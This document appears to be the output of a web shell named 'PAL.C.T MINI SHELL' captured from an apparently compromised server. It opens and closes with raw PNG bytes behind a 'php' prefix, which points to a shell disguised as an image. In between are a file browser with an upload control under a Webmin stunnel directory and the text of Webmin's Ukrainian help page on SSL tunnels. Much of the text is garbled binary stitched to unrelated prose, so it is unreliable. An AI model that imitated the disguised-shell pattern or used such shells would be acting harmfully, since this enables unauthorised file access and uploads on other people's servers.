php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.uk.auto.html

<header> Вступ до тунелів SSL </header> SSL - це протокол для шифрування даних у TCP-з&#39;єднанні під час подорожі по мережі. Спочатку він був розроблений для захисту трафіку між веб-браузерами та серверами, але може використовуватися для шифрування будь-якого типу потоку даних, який зазвичай надсилається через протокол TCP. <p> Протокол SSL дозволяє клієнтам і серверам аутентифікувати себе один одному, так що клієнт може бути впевнений, що він дійсно підключається до хоста, якого він вважає. Це робиться за допомогою сертифікатів, які видаються сертифікованим органом, визнаним клієнтом (щоб їх можна було перевірити) та пов’язаними з певним іменем хоста. Без сертифікатів зловмисник може перенаправити SSL-з&#39;єднання до власного сервера та захопити конфіденційну інформацію від клієнта, який вважає, що він спілкується з реальним сервером. <p> Будь-які дані, які подорожують Інтернетом незашифрованими, зловмисник може зафіксувати та прочитати доступ до однієї з мереж, через які він проходить. Навіть дані, що перебувають між клієнтом та серверною системою в локальній мережі, можна легко слухати. Під час підключення до сервера telnet, FTP або POP3 ваш пароль надсилається по мережі і таким чином може бути захоплений зловмисником. <p> SSL може використовуватися для захисту даних у подібних ситуаціях, але лише якщо клієнт і сервер підтримують їх. Більшість веб-браузерів та поштових клієнтів можуть здійснювати зашифровані SSL протоколи HTTP, POP3 та IMAP, але не всі веб-сервери та POP3 можуть приймати їх. Зокрема, POP3 важко захистити, оскільки стандартний сервер, який постачається з більшістю систем Unix, взагалі не підтримує SSL. На щастя, хоча є рішення - STunnel. <p> STunnel - це проста програма, яка перетворює незашифроване з&#39;єднання в зашифроване SSL. Зазвичай він налаштований для запуску із суперсервера, наприклад inetd або xinetd, а потім запустити якусь іншу програму, наприклад сервер POP3, який не підтримує SSL. Така конструкція дозволяє захищати будь-який сервер, який зазвичай працює від inetd, наприклад сервери telnet, NNTP та IMAP. <p> Не всі сервери можуть бути корисно захищені шифруванням, оскільки не існує клієнта, який би використовував їх у режимі SSL. Наприклад, я ніколи не чув про клієнт telnet або FTP, який може використовувати SSL, оскільки загальний пакет SSH вже дозволяє зашифровані віддалені входи та передачу файлів. <p> Цей модуль Webmin полегшує налаштування сервер суперсервера, який запускає STunnel для запуску якоїсь серверної програми. Незважаючи на те, що це можна зробити вручну за допомогою модуля Інтернет-сервісів, цей розроблений спеціально для налаштування та налаштування STunnel. Він автоматично визначає, якщо ви встановили inetd та / або xinetd, зчитує їх конфігурації для перевірки наявних тунелів SSL та додає їх під час створення нового тунелю. Якщо обидва встановлені, до конфігурації xinetd додаються нові тунелі SSL, оскільки він, на мій погляд, перевершує два. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`